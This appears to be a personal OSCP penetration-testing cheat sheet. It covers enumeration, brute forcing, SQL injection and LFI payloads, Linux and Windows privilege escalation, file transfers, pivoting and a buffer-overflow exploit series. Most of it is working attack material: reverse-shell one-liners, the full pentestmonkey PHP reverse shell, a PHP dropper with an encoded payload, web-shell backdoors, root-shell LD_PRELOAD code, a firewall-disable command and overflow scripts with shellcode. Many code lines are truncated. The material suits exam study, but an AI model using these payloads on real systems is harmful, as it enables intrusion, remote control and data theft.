OSCP Notes
OSCP Notes
OSCP Notes
by Harish G
Link_Matters
Enumeration
Port Scanning :
Optional - sT (performs full scan instead of syn-scan to prevent getting flagged by firewalls)
From Apache Version to finding Ubuntu version -> ubuntu httpd versions
Link_Matters
anonymous login check
ftp <ip address>
username : anonymous
pwd : anonymous
file upload -> put shell.php
id_rsa : Private key that is used for login. Might ask for password. can be cracked with
ssh2john and john
id_rsa
ssh -i id_rsa user@10.10.10.x
For passwordless login, add id_rsa.pub to target's authorized_keys
ssh2john
If port 53 is open
Add host to /etc/hosts
dig axfr smasher.htb @10.10.10.135
https://ghostphisher.github.io/smasher2
Add the extracted domain to /etc/hosts and dig again
RPC (135)
Link_Matters
2 rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names
3
4 rpcmap.py ncacn_ip_tcp:10.11.1.121[135]
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
Link_Matters
SMB Exploits :
SNMP (161)
IRC (194,6667,6660-7000)
NFS (2049)
showmount -e 10.1.1.27
mkdir /mnt/nfs
mount -t nfs 192.168.2.4:/nfspath-shown /mnt/nfs
Link_Matters
Permission Denied ? (https://blog.christophetd.fr/write-up-vulnix/)
MYSQL (3306)
Redis (6379)
In the output of config get * you could find the home of the redis user (usually /var/lib/redis
or /home/redis/.ssh), and knowing this you know where you can write the
authenticated_users file to access via ssh with the user redis. If you know the home of other
valid user where you have writable permissions you can also abuse it:
3. Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
4. Save the public key to the authorized_keys file on redis server:
Port Knocking :
1 TCP
2 knock -v 192.168.0.116 4 27391 159
3
4 UDP
5 knock -v 192.168.0.116 4 27391 159 -u
6
Link_Matters
7 TCP & UDP
8 knock -v 192.168.1.111 159:udp 27391:tcp 4:udp
Misc :
Run autorecon
https://github.com/s0wr0b1ndef/OSCP-
note/blob/master/ENUMERATION/enumeration
IF NOTHING WORKS
Link_Matters
Bruteforce
Directory Bruteforce
Cewl :
Hashcat :
https://hashcat.net/wiki/doku.php?id=example_hashes // m parameter
John :
Link_Matters
Online tools :
https://crackstation.net/
LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256,
sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)),
QubesV3.1BackupDefaults
https://www.dcode.fr/tools-list
MD4, MD5, RC4 Cipher, RSA Cipher, SHA-1, SHA-256, SHA-512, XOR Cipher
https://www.md5online.org/md5-decrypt.html (MD5)
https://md5.gromweb.com/ (MD5)
Protocols Bruteforce
Hydra
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc,
RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ,
SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP,
Subversion/SVN, Firebird, LDAP2, Cisco AAA
Medusa
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3,
PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2,
Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic
Wrapper, Web Form
Ncrack (Fastest)
SSH
Link_Matters
Wordlist
SMB :
HTTP Post
Link_Matters
80, 443
Checklist
IIS :
https://book.hacktricks.xyz/pentesting/pentesting-web/iis-internet-information-services
Try changing file.asp file to file.asp.txt to reveal the source code of the files
Apache :
Struts (https://github.com/LightC0der/Apache-Struts-0Day-Exploit)
Shell shock (https://www.exploit-db.com/exploits/34900)
OpenFuck (https://github.com/exploit-inters/OpenFuck)
Link_Matters
Directory Enumeration
Link_Matters
Parameter Fuzzing
WFUZZ
Wordpress
Wpscan
Metasploit
use auxiliary/scanner/http/wordpress_login_enum
Link_Matters
https://github.com/SecurityCompass/wo
rdpress-
SecurityCompass/wordpress-scripts scripts/blob/master/wp_login_user_enum
eration.py
Link_Matters
SQL Injection
Payloads
1 '
2 )'
3 "
4 `
5 ')
6 ")
7 `)
8 '))
9 "))
10 `))
11 '-SLEEP(30); #
Login Bypass
1 order by 1
2 ' UNION SELECT 1,2,3 -- -
3 ' UNION SELECT 1,@@version,3 -- -
4 ' UNION SELECT 1,user(),3 -- -
5 ' UNION SELECT 1,load_file('/etc/passwd'),3 -- -
6 ' UNION SELECT 1,load_file(0x2f6574632f706173737764),3 -- - //hex encod
7
8 ' UNION SELECT 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100))
9 ,3 -- - // char encode
Link_Matters
1 // List databases available
2 ' UNION SELECT 1,2,3,4,5,group_concat(table_schema) from information_schema
3
4 // Fetch Table names
5 ' UNION SELECT 1,group_concat(table_name),3 from information_schema.tables
6 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
7
8 // Fetch Column names from Table
9 ' UNION SELECT 1,group_concat(column_name),3 from information_schema.column
10 union all select 1,2,3,4,column_name,6 FROM information_schema.columns wher
11
12 // Dump data from Columns using 0x3a as seperator
13 ' UNION SELECT 1,group_concat(user,0x3a,pasword),3 from users limit 0,1-- -
14
15 // Backdoor
16
17 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OU
MSSQL
Link_Matters
File Upload
HTTP PUT
Cadaver
1 cadaver http://192.168.1.103/dav/
2 put /tmp/shell.php
1 # POST file
2 curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php
3
4 # POST binary data to web form
5 curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;"
Link_Matters
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -
v
Link_Matters
LFI
Files
1 /etc/passwd
2 /etc/shadow
3 /etc/knockd.conf // port knocking config
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
Basic LFI
1 http://url/index.php?page=../../../etc/passwd
2 http://url/index.php?page=../../../etc/shadow
3 http://url/index.php?page=../../../home/user/.ssh/id_rsa.pub
4 http://url/index.php?page=../../../home/user/.ssh/id_rsa
5 http://url/index.php?page=../../../home/user/.ssh/authorized_keys
http://url/index.php?page=../../../etc/passwd%00
php://filter
1 http://url/index.php?page=php://filter/convert.base64-encode/resource=index
2 http://url/index.php?page=pHp://FilTer/convert.base64-encode/resource=index
Link_Matters
input://
1 http://url/index.php?page=php://input
2 POST DATA: <?php system('id'); ?>
Link_Matters
Linux Privilege Escalation
OS & User Enumeration :
Link_Matters
44 ##################################### Cron tabs ###########################
45
46 ls -lah /etc/cron*
47 cat /etc/crontab
48 ls -la /var/log/cron* # Locating cron logs
49 find / -name cronlog 2>/dev/null
50 grep "CRON" /var/log/cron.log # for locating running jobs from logs
51 grep CRON /var/log/syslog # grepping cron from syslog
52
53
54 #################################### Internal Ports #######################
55
56 Netstat -alnp | grep LIST | grep port_num
57 Netstat -antp
58 netstat -tulnp
59 curl the listening ports
60
61 ################################### Interesting DIRS ######################
62 /
63 /dev
64 /scripts
65 /opt
66 /mnt
67 /var/www/html
68 /var
69 /etc
70 /media
71 /backup
72
73 ################################### SUID Binaries #########################
74
75 (https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binar
76
77 find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/
78 find / -perm -u=s -type f 2>/dev/null
79 find / -perm -4000 -user root 2>/dev/null
80 ldd /usr/bin/binary-name
81 strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file
82
83 ################################# Firewall Enumeration ####################
84
85 grep -Hs iptables /etc/*
86
87 ############################### Kernal Modules ############################
88
89 lsmod
90 /sbin/modinfo <mod name>
91
92
Link_Matters
PrivEsc Checklist :
Match the shared object that sits in a path where you have write access
create a shared object in the missing SO file name
run the SUID binary
Link_Matters
NFS Misconfiguration :
cat /etc/exports
On Kali
mkdir /tmp/nfs
On Target
/tmp/shell.elf
Kernel Exploits
cat /proc/version
uname -r
uname -mrs
cat /etc/lsb-release
cat /etc/os-release
Link_Matters
sudo chown root exploit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
1 #include <unistd.h>
2
3 int main()
4 {
5 setuid(0);
6 execl("/bin/bash", "bash", (char *)NULL);
7 return 0;
8 }
./exploit
# whoami
root
Tools :
Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://github.com/Ignitetechnologies/Privilege-Escalation
https://gtfobins.github.io/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Link_Matters
Mysql
MYSQL UDF Exploit: https://www.exploit-db.com/exploits/1518
1 mysql -u root
2
3 select sys_exec('whoami');
4 select sys_eval('whoami');
5
6 /* If function doesnt exist, create the function */
7 CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
8
9 if NULL returns, try redirecting the errors
10 select sys_eval('ls /root 2>&1');
Link_Matters
Sudo Abuse
1 $ sudo -l
2 [sudo] password for appadmin:
3 User appadmin may run the following commands on this host:
4 (root) /opt/Support/start.sh
Checklist
Environment Variables
(https://tryhackme.com/room/linuxprivesc)
Check which environment variables are inherited (look for the env_keep options):
sudo -l
LD_PRELOAD
libraries, or shared objects, that the loader will load before any other shared library including
the C runtime library.
1 /* Preload.c */
2
3 #include <stdio.h>
4 #include <sys/types.h>
5 #include <stdlib.h>
6
7 void _init() {
Link_Matters
8 unsetenv("LD_PRELOAD");
9 setresuid(0,0,0);
10 system("/bin/bash -p");
11 }
Run one of the programs you are allowed to run via sudo (listed when running sudo -l),
while setting the LD_PRELOAD environment variable to the full path of the new shared
object:
LD_LIBRARY_PATH
LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
Run ldd against the any program that you can execute as sudo (sudo -l) to see which
shared libraries are used by the program:
ldd /usr/sbin/apache2
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using
the code located at /home/user/tools/sudo/library_path.c:
1 /* Library_path.c */
2
3 #include <stdio.h>
4 #include <stdlib.h>
5
6 static void hijack() __attribute__((constructor));
7
8 void hijack() {
9 unsetenv("LD_LIBRARY_PATH");
10 setresuid(0,0,0);
11 system("/bin/bash -p");
12 }
Link_Matters
gcc -o /tmp/libcrypt.so.1 -shared -fPIC library_path.c
Run program using sudo, while settings the LD_LIBRARY_PATH environment variable to
/tmp (where we output the compiled shared object):
Link_Matters
Escalation Methods
Link_Matters
Windows Privilege Escalation
Enumeration
OS Info Enumeration
systeminfo
hostname
echo %username%
User Enumeration
whoami
net localgroup <group name> -> List the members of the given localgroup
tasklist /SVC
tasklist
net start
DRIVERQUERY
Permission Enumeration
C:\Program Files : icacls program_name
icacls root.txt /grant <username>:F (to grant permission to access file)
Check the PowerShell history file
type
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadlin
e\ConsoleHost_history.txt
Link_Matters
Network based
ipconfig
ipconfig /all
arp -a
router print
netstat -ano
Password Hunting
1 sc query windefend
2 netsh advfirewall firewall dump
3 netsh advfirewall show currentprofile
4 netsh advfirewall firewall show rule name=all
5 netsh firewall show state (show firewall running or stopped)
6 netsh firewall show config (show firewall configuration)
7
8 netsh firewall set opmode disable # Disable firewall
Scheduled Tasks
Mount Information
Link_Matters
mountvol
Escalation Techniques
whoami /priv
Run As :
1 cmdkey /list
2 Currently stored credentials:
3 Target: Domain:interactive=WORKGROUP\Administrator
4 Type: Domain Password
5 User: WORKGROUP\Administrator
Access check :
Link_Matters
Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
Powershell :
Binary planting
(https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services)
sc qc [service_name] // for service properties
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Link_Matters
1 reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
2 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
3
4 msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 –f msi > i
5
6 C:> msiexec /quiet /qn /i install.msi
Kernel Exploits :
https://github.com/abatchy17/WindowsExploits
https://github.com/SecWiki/windows-kernel-exploits
run systeminfo | capture the output and run windows-exploit-suggester.py
Compiling Kernel Exploits :
or for 32 bit
Powershell:
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
Link_Matters
WinPeas [ https://github.com/carlospolop/privilege-escalation-awesome-scripts-
suite/tree/master/winPEAS ]
Accesschk.exe
[https://github.com/jivoi/pentest/blob/master/post_win/accesschk_exe]
PowerUp (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
Seatbelt (https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
Metasploit :
getsystem
Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%2
0and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Win
PrivEsc Checlist)
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
Link_Matters
Linux Reverse Shells
Awk
Bash
exec 5<>/dev/tcp/LHOST/LPORT && while read line 0<&5; do $line 2>&5 >&5; don
Java
Javascript
Link_Matters
(function(){ var net = require("net"), cp = require("child_process"), sh = c
Netcat
Perl
Link_Matters
1 # Windows
2 perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"LPORT:LHOST");STDIN->fdopen
PHP
1 <?php system($_GET['cmd']);?>
2
3 <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
Link_Matters
Powershell
Python
1 # TCP
2 python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_
1 # STCP
2 python -c "import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET)
1 # UDP
2 python -c "import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_
Ruby
Link_Matters
1 # Windows
2 ruby -rsocket -e 'c=TCPSocket.new("LHOST","LPORT");while(cmd=c.gets);IO.pop
Socat
TCLsh
Telnet
xterm
Link_Matters
1 # Make sure the Xserver is listening to TCP.
2 xhost +RHOST
3 xterm -display LHOST:0 or DISPLAY=LHOST:0 xterm
Listeners
Link_Matters
Restricted Shell / SSH
If reverse shell not working :
Echo abc
Echo abc/
Echo abc -
Check env variables -> env
HOME= /
Echo ${HOME}/home
Optional (Using ASCII to evade badchars)
Printf “\55” -> -
SSH :
1 // Ways to no profile
2 ssh hostname -t "bash --noprofile"
3 ssh -t user@host bash --norc --noprofile
4 ssh -t username@hostname /bin/sh
5 ssh -t user@host "bash --norc --noprofile -c '/bin/rm .bashrc'"
6
7 // SSH bash shellshock (Troll2 Vulnhub)
8 ssh -i noob noob@192.168.0.119 '() { :; }; uname -a'
Link_Matters
export PATH=/bin/:sbin/:/usr/bin/:$PATH
payload = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
Link_Matters
Stable Reverse Shells
PHP
1 <?php
2 // php-reverse-shell - A Reverse Shell implementation in PHP
3 // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
4 //
5 // This tool may be used for legal purposes only. Users take full responsi
6 // for any actions performed using this tool. The author accepts no liabil
7 // for damage caused by this tool. If these terms are not acceptable to yo
8 // do not use this tool.
9 //
10 // In all other respects the GPL version 2 applies:
11 //
12 // This program is free software; you can redistribute it and/or modify
13 // it under the terms of the GNU General Public License version 2 as
14 // published by the Free Software Foundation.
15 //
16 // This program is distributed in the hope that it will be useful,
17 // but WITHOUT ANY WARRANTY; without even the implied warranty of
18 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
19 // GNU General Public License for more details.
20 //
21 // You should have received a copy of the GNU General Public License along
22 // with this program; if not, write to the Free Software Foundation, Inc.,
23 // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
24 //
25 // This tool may be used for legal purposes only. Users take full responsi
26 // for any actions performed using this tool. If these terms are not accep
27 // you, then do not use this tool.
28 //
29 // You are encouraged to send comments, improvements or suggestions to
30 // me at pentestmonkey@pentestmonkey.net
31 //
32 // Description
33 // -----------
34 // This script will make an outbound TCP connection to a hardcoded IP and p
35 // The recipient will be given a shell running as the current user (apache
36 //
37 // Limitations
38 // -----------
39 // proc_open and stream_set_blocking require PHP version 4.3+, or 5+
40 // Use of stream_select() on file descriptors returned by proc_open() will
41 // Some compile-time options are needed for daemonisation (like pcntl, posi
42 //
43 // Usage
Link_Matters
44 // -----
45 // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
46
47 set_time_limit (0);
48 $VERSION = "1.0";
49 $ip = '127.0.0.1'; // CHANGE THIS
50 $port = 1234; // CHANGE THIS
51 $chunk_size = 1400;
52 $write_a = null;
53 $error_a = null;
54 $shell = 'uname -a; w; id; /bin/sh -i';
55 $daemon = 0;
56 $debug = 0;
57
58 //
59 // Daemonise ourself if possible to avoid zombies later
60 //
61
62 // pcntl_fork is hardly ever available, but will allow us to daemonise
63 // our php process and avoid zombies. Worth a try...
64 if (function_exists('pcntl_fork')) {
65 // Fork and have the parent process exit
66 $pid = pcntl_fork();
67
68 if ($pid == -1) {
69 printit("ERROR: Can't fork");
70 exit(1);
71 }
72
73 if ($pid) {
74 exit(0); // Parent exits
75 }
76
77 // Make the current process a session leader
78 // Will only succeed if we forked
79 if (posix_setsid() == -1) {
80 printit("Error: Can't setsid()");
81 exit(1);
82 }
83
84 $daemon = 1;
85 } else {
86 printit("WARNING: Failed to daemonise. This is quite common and not fata
87 }
88
89 // Change to a safe directory
90 chdir("/");
91
92 // Remove any umask we inherited
93 umask(0);
94
Link_Matters
95 //
96 // Do the reverse shell...
97 //
98
99 // Open reverse connection
100 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
101 if (!$sock) {
102 printit("$errstr ($errno)");
103 exit(1);
104 }
105
106 // Spawn shell process
107 $descriptorspec = array(
108 0 => array("pipe", "r"), // stdin is a pipe that the child will read fr
109 1 => array("pipe", "w"), // stdout is a pipe that the child will write
110 2 => array("pipe", "w") // stderr is a pipe that the child will write
111 );
112
113 $process = proc_open($shell, $descriptorspec, $pipes);
114
115 if (!is_resource($process)) {
116 printit("ERROR: Can't spawn shell");
117 exit(1);
118 }
119
120 // Set everything to non-blocking
121 // Reason: Occsionally reads will block, even though stream_select tells us
122 stream_set_blocking($pipes[0], 0);
123 stream_set_blocking($pipes[1], 0);
124 stream_set_blocking($pipes[2], 0);
125 stream_set_blocking($sock, 0);
126
127 printit("Successfully opened reverse shell to $ip:$port");
128
129 while (1) {
130 // Check for end of TCP connection
131 if (feof($sock)) {
132 printit("ERROR: Shell connection terminated");
133 break;
134 }
135
136 // Check for end of STDOUT
137 if (feof($pipes[1])) {
138 printit("ERROR: Shell process terminated");
139 break;
140 }
141
142 // Wait until a command is end down $sock, or some
143 // command output is available on STDOUT or STDERR
144 $read_a = array($sock, $pipes[1], $pipes[2]);
145 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
Link_Matters
146
147 // If we can read from the TCP socket, send
148 // data to process's STDIN
149 if (in_array($sock, $read_a)) {
150 if ($debug) printit("SOCK READ");
151 $input = fread($sock, $chunk_size);
152 if ($debug) printit("SOCK: $input");
153 fwrite($pipes[0], $input);
154 }
155
156 // If we can read from the process's STDOUT
157 // send data down tcp connection
158 if (in_array($pipes[1], $read_a)) {
159 if ($debug) printit("STDOUT READ");
160 $input = fread($pipes[1], $chunk_size);
161 if ($debug) printit("STDOUT: $input");
162 fwrite($sock, $input);
163 }
164
165 // If we can read from the process's STDERR
166 // send data down tcp connection
167 if (in_array($pipes[2], $read_a)) {
168 if ($debug) printit("STDERR READ");
169 $input = fread($pipes[2], $chunk_size);
170 if ($debug) printit("STDERR: $input");
171 fwrite($sock, $input);
172 }
173 }
174
175 fclose($sock);
176 fclose($pipes[0]);
177 fclose($pipes[1]);
178 fclose($pipes[2]);
179 proc_close($process);
180
181 // Like print, but does nothing if we've daemonised ourself
182 // (I can't figure out how to redirect STDOUT like a proper daemon)
183 function printit ($string) {
184 if (!$daemon) {
185 print "$string\n";
186 }
187 }
188
189 ?>
190
191
192
Python
Link_Matters
1 import socket,subprocess,os
2 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
3 s.connect(("192.168.0.110",4444))
4 os.dup2(s.fileno(),0)
5 os.dup2(s.fileno(),1)
6 os.dup2(s.fileno(),2)
7 p=subprocess.call(["/bin/sh","-i"])
8
Link_Matters
Spawn TTY
Bash
1 /bin/bash -i
2 echo os.system('/bin/bash')
3 /bin/sh -i
Python
Perl
Socat
On the attacker machine, set up socat listener: replace 4444 with your listening port.
On the victim machine, connect back the attacker machine and spawn a shell. Replace
<host> with attacker IP and <port> with attacker listing port.
Link_Matters
Misc
Interactive TTY
user@remote:~$ ^Z
user@local:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /
Ignoring hotkeys in the local shell and getting back to the remote:
Setting correct size for the remote shell (where ROWS and COLS are the values from
the 3rd bullet):
Link_Matters
user@remote:~$ export TERM=xterm-256color
Link_Matters
Windows Reverse Shells
PHP :
1 <?php
2
3 header('Content-type: text/plain');
4 $ip = "192.168.1.9"; //change this
5 $port = "1234"; //change this
6 $payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGK
7 $evalCode = gzinflate(base64_decode($payload));
8 $evalArguments = " ".$port." ".$ip;
9 $tmpdir ="C:\\windows\\temp";
10 chdir($tmpdir);
11 $res .= "Using dir : ".$tmpdir;
12 $filename = "D3fa1t_shell.exe";
13 $file = fopen($filename, 'wb');
14 fwrite($file, $evalCode);
15 fclose($file);
16 $path = $filename;
17 $cmd = $path.$evalArguments;
18 $res .= "\n\nExecuting : ".$cmd."\n";
19 echo $res;
20 $output = system($cmd);
21
22 ?>
Windows Python :
Powershell :
Link_Matters
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.
Certutil :
Metasploit :
1 use exploit/windows/smb/smb_delivery
2 msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 //your LH
3 msf exploit(windows/smb/smb_delivery) > exploit
4
5
6 rundll32.exe \\192.168.1.109\vabFG\test.dll,0
Link_Matters
Credits : Hacking Articles
Resources :
https://book.hacktricks.xyz/shells/shells/windows
https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
Link_Matters
File Transfers
Set up FTP :
HTTP :
python -m SimpleHTTPServer
python3 -m http.server
updog (https://github.com/sc0tfree/updog)
Linux :
curl
wget
Netcat
1 // Receiver
2 nc 192.168.0.1 4444 < file
3
4 // Sender
5 cat file | nc -nlvp 4444 // Normal file
6
7 // Base64 encoded sender
8 cat binary | base64 | nc -nlvp 4444
9
Windows :
Link_Matters
certutil -urlcache -f http://<ip>/uri output.ext
//10.10.10.x/smb
Link_Matters
Cryptography
HTB Machines :
HTB Obscurity
HTB Frolic - Multiple Encodings and Ciphers
Common Ciphers :
Cipher Identifier :
https://www.boxentriq.com/code-breaking/cipher-identifier
https://gchq.github.io/CyberChef/
https://www.devglan.com/online-tools/aes-encryption-decryption (AES)
Hash-Identifier (Kali)
hashid
Link_Matters
Pivot
Chisel :
Burp -> user options -> socks proxy -> use socks proxy
vi /etc/proxychains.conf
Change socks4(metasploit) to socks5(ssh)
Link_Matters
proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]
Link_Matters
Buffer Overflows
Steps :
1. Fuzzing
2. Finding the Offset
3. Overwriting the EIP
4. Finding Bad Characters
5. Finding the JMP ESP address
. Exploiting the System
1. Fuzzing
1 #!/usr/bin/python
2 # -*- coding: utf-8 -*-
3 #!/usr/bin/python
4
5 import sys, socket
6
7 buffer = "\x41" * 3000
8
9 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 s.connect(('10.0.0.71', 9999))
11 s.send(('TRUN /.:/' + buffer))
12 s.recv(1024)
13 s.close()
14
Cmd :
msf-pattern_create -l 3000
msf-pattern_offset -q 386F4337
1 #!/usr/bin/python
2 # -*- coding: utf-8 -*-
Link_Matters
3 import sys
4 import socket
5
6 offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
7 try:
8 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
9 s.connect(('10.0.0.71', 9999))
10 s.send('TRUN /.:/' + offset)
11 s.close()
12 except:
13
14 print('Error connecting to server')
15 sys.exit()
16
1 #!/usr/bin/python
2 # -*- coding: utf-8 -*-
3 import sys
4 import socket
5
6 shellcode = 'A' * 2003 + 'B' * 4
7
8 try:
9 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 s.connect(('10.0.0.71', 9999))
11 s.send('TRUN /.:/' + shellcode)
12 s.close()
13 except:
14
15 print('Error connecting to server')
16 sys.exit()
17
1 badchars = (
2 "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
3 "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
4 "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
5 "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
Link_Matters
6 "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
7 "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
8 "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
9 "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
10 "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
11 "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
12 "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
13 "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
14 "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
15 "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
16 "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
17 "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
18 )
1 #!/usr/bin/python
2 import sys, socket
3
4 badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x
5 "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x
6 "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x
7 "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x
8 "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x
9 "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\x
10 "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\x
11 "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\x
12
13 shellcode = "A" * 2003 + "B" * 4 + badchars
14
15 try:
16 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
17 s.connect(('10.0.0.71',9999))
18 s.send(('TRUN /.:/' + shellcode))
19 s.close()
20
21 except:
22 print("Error connecting to server")
23 sys.exit()
jmp -r esp
Link_Matters
Alternate Way :
!mona modules
1 #!/usr/bin/python
2 # -*- coding: utf-8 -*-
3 import sys
4 import socket
5
6 shellcode = 'A' * 2003 + "\xaf\x11\x50\x62"
7
8 try:
9 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 s.connect(('10.0.0.71', 9999))
11 s.send('TRUN /.:/' + shellcode)
12 s.close()
13 except:
14
15 print('Error connecting to server')
16 sys.exit()
6. Exploit
1 #!/usr/bin/python
2 # -*- coding: utf-8 -*-
3
4 import sys
5 import socket
6
7 overflow = (
8 "\xb8\x0c\x65\xe6\x11\xda\xd9\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
9 "\x52\x31\x42\x12\x83\xea\xfc\x03\x4e\x6b\x04\xe4\xb2\x9b\x4a"
10 "\x07\x4a\x5c\x2b\x81\xaf\x6d\x6b\xf5\xa4\xde\x5b\x7d\xe8\xd2"
11 "\x10\xd3\x18\x60\x54\xfc\x2f\xc1\xd3\xda\x1e\xd2\x48\x1e\x01"
